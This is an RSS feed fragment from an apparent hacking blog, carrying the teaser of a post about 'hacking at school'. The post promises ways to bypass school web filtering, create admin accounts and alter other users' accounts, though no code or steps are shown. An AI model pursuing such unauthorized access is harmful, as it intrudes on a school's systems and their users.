<p>There are problems with school servers, and they mostly come back to the basic architecture of the system &#8211; so the admins are unlikely to do anything about it! In this article I will discuss how to bypass web filtering software at school, send messages everywhere you want, create admin accounts, modify others&#8217; accounts, and generally cause havok. Please note that I ahve refrained from giving away information that will actually screw up your school server, though intelligent thinkers will work it out. This is because, for god sakes, this is a school! Don&#8217;t screw them up!<br /></b></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=39&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2007/09/hacking-at-school.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>


<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching using disk: basic
Object Caching 1153/1297 objects using disk: basic

Served from: hungry-hackers.com @ 2012-02-12 03:34:03 -->
